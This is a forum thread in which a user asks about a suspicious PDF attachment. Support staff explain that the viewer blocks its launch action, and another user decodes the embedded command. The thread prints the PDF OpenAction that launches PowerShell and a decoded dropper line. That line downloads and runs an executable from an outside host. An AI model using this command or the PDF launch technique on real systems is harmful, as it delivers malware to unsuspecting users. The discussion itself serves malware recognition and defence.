Hazardous pdf file?

BrianG · Post by **BrianG** » Tue Apr 19, 2016 3:49 pm

I have heard of the potential for pdf attachments to be hazardous but had not seen a suspicious one until this morning. Here are the first several lines of the file as seen in the preview pane of my email client:

%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand

Would someone please provide a brief explanation of what this is because it appears that an execution of powershell will occur when the pdf is opened. If so, what settings do I need to look at in Editor and Viewer to insure such action is prevented?

Post by **Will - Tracker Supp** » Tue Apr 19, 2016 3:57 pm

Hi Brian,

Thanks for the post - without the file, we can only tell as much as you can. It looks like the PDF is set to run a powershell command, but that's all we can see. Please send the file and I'll see if the Dev. Team can take a quick look.

Cheers,

BrianG · Post by **BrianG** » Tue Apr 19, 2016 4:13 pm

File is attached as powershell_exe.7z.

Post by **Will - Tracker Supp** » Tue Apr 19, 2016 5:37 pm

Hi Brian,

Thanks for that - devs. have taken a look and can't see what it's doing, because the command is encoded, but it's almost certainly malicious and we block this action by default, so you should be safe if you opened it, so long as you did not allow it to run.

Cheers,

BrianG · Post by **BrianG** » Tue Apr 19, 2016 5:46 pm

Could you explain what behavior I would expect to see if it tried to run? I am very concerned about this because I normally open pdf attachments. It was just a fluke that I had attachment preview enabled in my email client so noticed the powershell related content before I opened the file.

Post by **Will - Tracker Supp** » Tue Apr 19, 2016 5:53 pm

Hi Brian,

I'm afraid that we cannot tell what it would do, because the command that it was set to run was encrypted. However, opening the PDF would display this message:

The command will not execute unless you explicitly hit yes, on this message. You should be safe with most malicious files, with our software.

Thanks,

BrianG · Post by **BrianG** » Tue Apr 19, 2016 6:28 pm

That popup warning is exactly what I was wondering about. Very nice!

Thanks Will.

--
Brian

Post by **Will - Tracker Supp** » Tue Apr 19, 2016 7:21 pm

No worries Brian

ChrisZ16 · Post by **ChrisZ16** » Tue Apr 19, 2016 10:46 pm

The decoded command is:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)

It hidden downloads a file "mike.exe" from ncduganda.org and executes it.

Cheers

Wed Apr 20, 2016 12:14 am

Hello ChrisZ16

Thank you very much for the translation! That makes it abundantly clear that this file does indeed contain malicious content.

Cheers!

Hazardous pdf file?

Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?

Re: Hazardous pdf file?